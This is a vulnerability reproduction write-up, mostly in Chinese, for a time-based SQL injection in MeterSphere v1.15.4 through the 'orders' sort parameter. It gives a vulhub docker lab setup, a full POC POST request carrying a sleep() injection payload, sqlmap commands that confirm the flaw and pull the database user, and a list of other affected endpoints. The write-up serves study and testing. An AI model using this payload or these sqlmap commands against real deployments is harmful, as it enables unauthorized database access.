漏洞信息
Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the “orders” parameter.
Authenticated users can control the parameters in the “order by” statement, which causing SQL injection.
API: /test/case/list/{goPage}/{pageSize}
背景介绍
MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.
主页:https://metersphere.io/
源码:https://github.com/metersphere/metersphere
环境搭建
docker-compose.yml:
version: "2.1"
services:
web:
image: vulhub/metersphere:1.15.4
ports:
- "8081:8081"
- "5005:5005"
environment:
MYSQL_SERVER: db:3306
MYSQL_DB: metersphere
MYSQL_USERNAME: root
MYSQL_PASSWORD: root
KAFKA_SERVER: kafka:9092
db:
image: mysql:5.7
command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000
environment:
- MYSQL_ROOT_PASSWORD=root
- MYSQL_DATABASE=metersphere
kafka:
image: bitnami/kafka:3.4.1
environment:
# KRaft settings
- KAFKA_CFG_NODE_ID=0
- KAFKA_CFG_PROCESS_ROLES=controller,broker
- KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093
# Listeners
- KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093
- KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092
- KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
- KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
- KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT
Web UI:http://127.0.0.1:8081
账号admin、密码metersphere
漏洞复现
参考: [BUG]Time-based SQL Injetion in v1.15.4 · Issue #8651 · metersphere/metersphere
登录Web UI后进入http://127.0.0.1:8081/#/track/case/all创建新的测试用例:
POC:
POST /test/case/list/1/10 HTTP/1.1
Host: localhost.lan:8081
Content-Length: 3149
Accept: application/json, text/plain, */*
CSRF-TOKEN: fXx2lJHlPYUA1mmtPn69Bhxtx7UVXEz676ScrXnOlFyUcUPQ0hrM9pjbe4U23MDLdURgu8bAJTZdIdVUYsbaOg==
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1733898529; skinName=skin-blue3; pageNo=1; pageSize=20; MS_SESSION_ID=2aad45b5-a17a-4a02-8e5d-0321805852d0
Connection: close
{"orders":[{"name":"name","type":",if(1=1,sleep(10),sleep(0))"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}
if分支执行:
else分支执行:
基于此可以验证存在时间盲注,通过sqlmap或者自己写爆破脚本实现漏洞利用:
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user
此外,这个漏洞还存在于很多其他接口:
/test/plan/case/list/all
/test/plan/case/list/ids
/issues/list/{goPage}/{pageSize}
/test/case/list/{goPage}/{pageSize}
漏洞分析
漏洞source位于backend/src/main/java/io/metersphere/track/service/TestPlanTestCaseService.java:
漏洞sink位于backend/src/main/java/io/metersphere/base/mapper/ext/ExtTestPlanTestCaseMapper.xml:
